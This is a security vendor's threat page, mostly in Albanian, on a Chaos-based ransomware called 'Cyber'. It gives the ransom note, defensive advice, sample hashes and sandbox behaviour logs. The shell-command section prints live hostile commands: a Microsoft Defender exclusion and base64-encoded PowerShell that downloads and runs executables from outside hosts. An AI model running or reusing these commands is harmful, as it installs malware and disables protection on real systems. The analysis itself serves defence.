Cyber Ransomware
Karta e rezultateve të kërcënimit
EnigmaSoft Threat Scorecard
Kartat e rezultateve të kërcënimit EnigmaSoft janë raporte vlerësimi për kërcënime të ndryshme malware, të cilat janë mbledhur dhe analizuar nga ekipi ynë i kërkimit. Kartat e rezultateve të EnigmaSoft Threat vlerësojnë dhe renditin kërcënimet duke përdorur disa metrika, duke përfshirë faktorët e rrezikut të botës reale dhe të mundshme, tendencat, shpeshtësinë, prevalencën dhe qëndrueshmërinë. Kartat e rezultateve të EnigmaSoft Threat përditësohen rregullisht bazuar në të dhënat dhe metrikat tona të kërkimit dhe janë të dobishme për një gamë të gjerë përdoruesish kompjuterësh, nga përdoruesit fundorë që kërkojnë zgjidhje për të hequr malware nga sistemet e tyre deri tek ekspertët e sigurisë që analizojnë kërcënimet.
Kartat e rezultateve të EnigmaSoft Threat shfaqin një sërë informacionesh të dobishme, duke përfshirë:
Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Niveli i ashpërsisë: Niveli i përcaktuar i ashpërsisë së një objekti, i përfaqësuar numerikisht, bazuar në procesin dhe kërkimin tonë të modelimit të rrezikut, siç shpjegohet në Kriteret tona të Vlerësimit të Kërcënimit .
Kompjuterët e infektuar: Numri i rasteve të konfirmuara dhe të dyshuara të një kërcënimi të veçantë të zbuluar në kompjuterët e infektuar siç raportohet nga SpyHunter.
Shihni gjithashtu Kriteret e Vlerësimit të Kërcënimit .
| Popularity Rank: | 10,078 |
| Niveli i Kërcënimit: | 100 % (Lartë) |
| Kompjuterët e infektuar: | 3,489 |
| Parë për herë të parë: | October 15, 2021 |
| Parë për herë të fundit: | November 12, 2025 |
| OS/OS të prekura: | Windows |
Programi me qëllim të keq i quajtur Cyber është malware nga lloji ransomware. Pasi ekzekutohet në një sistem të shkelur, ai menjëherë fillon një proces enkriptimi për të gjithë skedarët në pajisje dhe shton emrat e tyre origjinalë të skedarëve me një shtesë '.Cyber'. Për shembull, një skedar me një emër fillestar "1.doc" tani do të shfaqet si "1.doc.Cyber" pasi të jetë i koduar. Në mënyrë të ngjashme, '2.pdf' do të bëhej '2.pdf.Cyber' e kështu me radhë. Studiuesit e sigurisë kibernetike theksojnë se kërcënimi Cyber Ransomware bazohet në llojin e malware Chaos.
Përveç enkriptimit të skedarit, Cyber Ransomware ndryshon gjithashtu sfondin e desktopit dhe gjeneron një shënim shpërblese të quajtur 'read_it.txt.' Shënimi i shpërblimit përmban udhëzime për viktimat, ku kriminelët kibernetikë përgjegjës për sulmet e ransomware zakonisht kërkojnë pagesë në këmbim të çelësit të deshifrimit për të zhbllokuar skedarët e koduar.
Tabela e Përmbajtjes
Cyber Ransomware mund t’i bëjë të paarritshëm lloje të shumta skedarësh përmes enkriptimit
Shënimi i ransomware tregon se skedarët e rëndësishëm të viktimës, të tilla si bazat e të dhënave, dokumentet dhe fotot, janë të koduara dhe mund të deshifrohen vetëm duke paguar një shpërblim në kriptomonedhën Bitcoin. Zakonisht përmendet shuma e shpërblimit dhe viktimave u jepet një mënyrë për të testuar deshifrimin në një numër të kufizuar skedarësh përpara se të paguajnë.
Shënimi shpesh përmban informacione kontakti për sulmuesit ose përfaqësuesit e tyre. Megjithatë, ndonjëherë informacioni i kontaktit mund të mos jetë i vlefshëm dhe viktima mund të ketë vështirësi në komunikimin me sulmuesit. Për më tepër, sfondi i ransomware mund të shfaq të njëjtin mesazh dhe shumën e shpërblimit, por me detaje të ndryshme kontakti.
Në shumicën e sulmeve ransomware, deshifrimi pa përfshirjen e sulmuesve zakonisht nuk është i mundur. Edhe kur viktimat paguajnë shpërblimin, ata mund të mos marrin çelësat e deshifrimit ose softuerin e nevojshëm për të rikuperuar skedarët e tyre. Si rezultat, ekspertët këshillojnë fuqimisht kundër pagesës së shpërblimit, edhe nëse informacioni i kontaktit është i ligjshëm dhe shuma e shpërblimit duket e përballueshme.
Është thelbësore të mbani mend se pagesa e shpërblimit mbështet aktivitetin kriminal dhe nuk garanton rikuperimin e të dhënave të koduara. Viktimat duhet të eksplorojnë opsione të tjera, të tilla si rivendosja e skedarëve nga kopjet rezervë ose kërkimi i ndihmës nga ekspertët e sigurisë.
Sigurohuni që të mbroni pajisjet dhe të dhënat tuaja nga kërcënimet si Ransomware në internet
Masat më të mira që përdoruesit mund të zbatojnë për të mbrojtur pajisjet dhe të dhënat e tyre nga sulmet e ransomware përfshijnë një kombinim të strategjive proaktive dhe reaktive.
Së pari, përdoruesit duhet të jenë vigjilentë në aktivitetin e tyre në internet dhe të ndërmarrin hapa për të shmangur bërjen viktimë e vektorëve të zakonshëm të infeksionit ransomware, të tilla si emailet e phishing ose shkarkimet me qëllim të keq. Kjo përfshin përdorimin e fjalëkalimeve të forta dhe unike, përditësimin e rregullt të softuerit dhe sistemeve operative dhe të qenit të kujdesshëm ndaj emaileve ose lidhjeve të dyshimta.
Së dyti, përdoruesit duhet të zbatojnë masa sigurie, të tilla si përdorimi i softuerit me reputacion kundër malware dhe mundësimi i mureve të zjarrit për të bllokuar aksesin e paautorizuar në pajisjet e tyre. Ata gjithashtu duhet të konsiderojnë përdorimin e mjeteve të zbulimit dhe përgjigjes së pikës fundore (EDR), të cilat mund të ndihmojnë në zbulimin dhe përgjigjen ndaj sulmeve të ransomware në kohë reale.
Së treti, përdoruesit duhet të kopjojnë rregullisht të dhënat e tyre të rëndësishme në një burim të jashtëm, siç është një shërbim cloud ose një hard disk i jashtëm. Kjo mund të ndihmojë për të siguruar që edhe nëse pajisja e tyre është e infektuar me ransomware, ata ende mund të kenë akses në të dhënat e tyre pa paguar shpërblimin.
Së katërti, në rast të një sulmi ransomware, përdoruesit duhet të shmangin pagesën e shpërblimit pasi mund të mos garantojë rikuperimin e sigurt të të dhënave të tyre dhe gjithashtu mund të inkurajojë aktivitete të mëtejshme kriminale. Në vend të kësaj, ata duhet të kërkojnë ndihmë profesionale nga ekspertët e sigurisë dhe të konsiderojnë raportimin e sulmit tek forcat e rendit.
Së fundi, përdoruesit duhet të qëndrojnë të informuar për kërcënimet më të fundit të ransomware dhe teknikat e sulmeve në zhvillim për të qëndruar të vetëdijshëm dhe të përgatitur për të mbrojtur veten nga sulmet e mundshme.
Teksti i plotë i shënimit të shpërblimit të lëshuar nga Cyber Ransomware është:
Mos u shqetësoni, ju mund t'i ktheni të gjitha dosjet tuaja!
Të gjithë skedarët tuaj si dokumentet, fotot, bazat e të dhënave dhe të tjera të rëndësishme janë të koduara
Çfarë garancish ju japim?
Ju mund të dërgoni 3 nga skedarët tuaj të enkriptuar dhe ne i deshifrojmë ato falas.
Për të deshifruar skedarët tuaj, duhet të ndiqni këto hapa:
1) Shkruani në e-mailin tonë :test@test.com (Në rast se nuk keni përgjigje brenda 24 orëve, kontrolloni dosjen tuaj të spam-it
ose na shkruani në këtë e-mail: test2@test.com)
2) Merrni Bitcoin (Duhet të paguani për deshifrimin në Bitcoin.
Pas pagesës, ne do t'ju dërgojmë mjetin që do të deshifrojë të gjithë skedarët tuaj.)
Cyber Ransomware Video
Këshillë: Kthejeni tingullin tuaj dhe të shikojnë video në mënyrë të plotë ekran.

Raporti i analizës
Informacion i pergjithshem
| Family Name: | Cyber Ransomware |
|---|---|
| Signature status: | No Signature |
Known Samples
Known Samples
This section lists other file samples believed to be associated with this family.|
MD5:
6ae50bdc7246401c666cd7e1b200d87a
SHA1:
ec759c5df1845d1109fe2518380233ae1854850f
Madhësia e skedarit:
1.84 MB, 1839616 bytes
|
|
MD5:
92a4a3aa4b40e95e8ca1d015c048246b
SHA1:
443a688cc83423c7511d56b626f85a392e798ac1
Madhësia e skedarit:
5.12 KB, 5120 bytes
|
|
MD5:
969c9e50187024581e8943a2d8ed9d2d
SHA1:
57cec27d4e6c7714265cad52f7fd9cf58f68bb82
SHA256:
C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D
Madhësia e skedarit:
4.61 KB, 4608 bytes
|
|
MD5:
d1657a06fd2a757c43372f77ed433f30
SHA1:
48d0f17e206fdcff74121783989c90117ee411f4
SHA256:
0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725
Madhësia e skedarit:
4.54 MB, 4536320 bytes
|
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have security information
- File is 32-bit executable
- File is either console or GUI application
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
Show More
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.File Traits
- HighEntropy
- No Version Info
- x86
Block Information
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.| Total Blocks: | 8 |
|---|---|
| Potentially Malicious Blocks: | 7 |
| Whitelisted Blocks: | 1 |
| Unknown Blocks: | 0 |
Visual Map
? - Unknown Block
x - Potentially Malicious Block
Similar Families
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.- ClipBanker.VA
- ClipBanker.VB
Files Modified
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.| File | Attributes |
|---|---|
| \device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| c:\users\user\appdata\local\cheat.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\launcher.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\launcher.ini | Generic Write,Read Attributes |
| c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1 | Generic Write,Read Attributes |
Show More
| c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\father.bat | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\father.bat | Synchronize,Write Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat | Synchronize,Write Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 | Synchronize,Write Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp | Generic Write,Read Attributes,Delete |
| c:\users\user\appdata\local\temp\ttrj.exe | Generic Write,Read Attributes |
| c:\users\user\deployment_test.exe | Generic Write,Read Attributes |
Registry Modifications
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.| Key::Value | Të dhënat | API Name |
|---|---|---|
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 넜泝Ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey |
Show More
| HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0 | rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\" | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | ᭖洢Ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 洧Ǜ | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0 | C:\Users\Vebexpvr\AppData\Local\Launcher.exe C:\Users\Vebexpvr\AppData\Local | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1 | Z1 敖敢灸牶 B 뻯 . Vebexpvr | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0 | V1 嫬齤灡摰瑡a@ 뻯啮坤嫬齤. 穗 붽æappdata | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0 | P1 嫬齤潬慣l< 뻯嫬齤嫬齥. 穘 ˑQlocal | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot | | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype | Generic | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 椓嵌Ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ﻒ⍮味ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | 㴠 ȁ 龡^ 8 獖} | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey |
Windows API Usage
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.| Category | API |
|---|---|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Syscall Use |
Show More
206 additional items are not displayed above. |
| Anti Debug |
|
| User Data Access |
|
| Encryption Used |
|
| Other Suspicious |
|
Shell Command Execution
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.
open C:\Users\Vebexpvr\AppData\Local\Launcher.exe
|
open C:\Users\Vebexpvr\deployment_test.EXE
|
cmd.exe /c father.bat
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"
|
open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="
|
Show More
open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="
|
open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="
|
open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe
|
open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe
|